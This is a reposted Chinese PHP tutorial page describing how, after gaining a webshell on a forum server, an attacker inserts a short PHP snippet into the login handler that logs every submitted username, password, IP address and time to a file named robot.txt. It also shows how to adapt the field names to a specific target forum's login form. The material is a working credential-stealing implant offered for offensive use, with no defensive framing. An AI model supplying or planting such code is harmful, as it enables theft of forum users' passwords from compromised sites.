简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW)
Home > Backend Development > PHP Tutorial > body text

截取php后台登陆密码的代码_PHP教程

WBOY
Release: 2016-07-13 17:43:58
Original
989 people have browsed it

拿到webshell之后,想要进一步渗透,诸如discuz的密码,不是直接用md5加密的,破解难度很大。以前帮大头写过一次,昨天小猪大哥正好用到,就又写了一遍。代码比较简单,就几句话,我把原理说的详细点,照顾下对php不太了解有朋友。

 
 
if($_POST[loginsubmit]!=){ //判断是否点了登陆按钮
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 连起来赋值给变量$sb 
fwrite(fopen(robot.txt,ab),$sb);} //结果写入一个文件
 
 
下面简单分析一下,以华夏的登陆页面为例。打开bbs.xxx.com/login.php 右键查看源码,CTRL+F搜索action找到登陆的表单。
 
我只复制了关键代码过来.
 
 
//action后面的值即是表单提交的地址,里面会处理登陆,比如判断密码是不是正确什么的 method为POST,所以用$_POST接收。
 
。。。。强大的省略号。。。。。。
 
账号(U):
class=input id=pwuser accessKey=u size=16 
name=pwuser>
//用户名的input输入框, 注意其name的值, 要和$_POST[username] 这里面的对应, 所以要截取华夏的密码,需要改为 $_POST[pwuser]
 
密 码(P):
class=input id=pwpwd accessKey=p 
type=password size=16 name=pwpwd>
//用户名的input输入框, 注意其name的值, 要和$_POST[username] 这里面的对应, 所以要截取华夏的密码,需要改为 $_POST[pwpwd]
 

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/478807.htmlTechArticle拿到webshell之后,想要进一步渗透,诸如discuz的密码,不是直接用md5加密的,破解难度很大。以前帮大头写过一次,昨天小猪大哥正好用到,...
Related labels:
discuz php webshell code Backstage password intercept Login of further
source:php.cn
Previous article:PHP+TEXT留言本(二)_PHP教程 Next article:php生成psd缩略图_PHP教程
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
How to make table cell values ​​hyperlinked in Dash? (Using Plotly, Dash, Pandas, etc.) I want to set the cell value under the "JobLink" column as a hyperlink. When I c...
From 2023-11-17 18:47:10
0
1
283
Best way to preload route data before accessing the route. Before rendering the page for a given route, I want to first get the necessary data synchr...
From 2023-11-17 14:54:42
0
2
379
Nuxt.js SSG (Static Site Generator) Get API Data When building a project using a static site generator, I understand that documentation cre...
From 2023-11-16 21:36:07
0
1
176
How to get multiple data with the same user ID from a table in Nest.js? Assuming I have a users table, how do I get the data that matches the user ID? How to get multiple data with same user id from table in Nestjs? Let's say I have a users ...
From 2023-11-16 20:41:42
0
2
214
Encountered PHPMailer undefined type error (tried using Composer also didn't work) I don't know why I'm getting this "PHPMailer undefined type" error. First, I tri...
From 2023-11-12 17:35:06
0
1
180
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template
About us Disclaimer Sitemap
php.cn:Public welfare online PHP training,Help PHP learners grow quickly!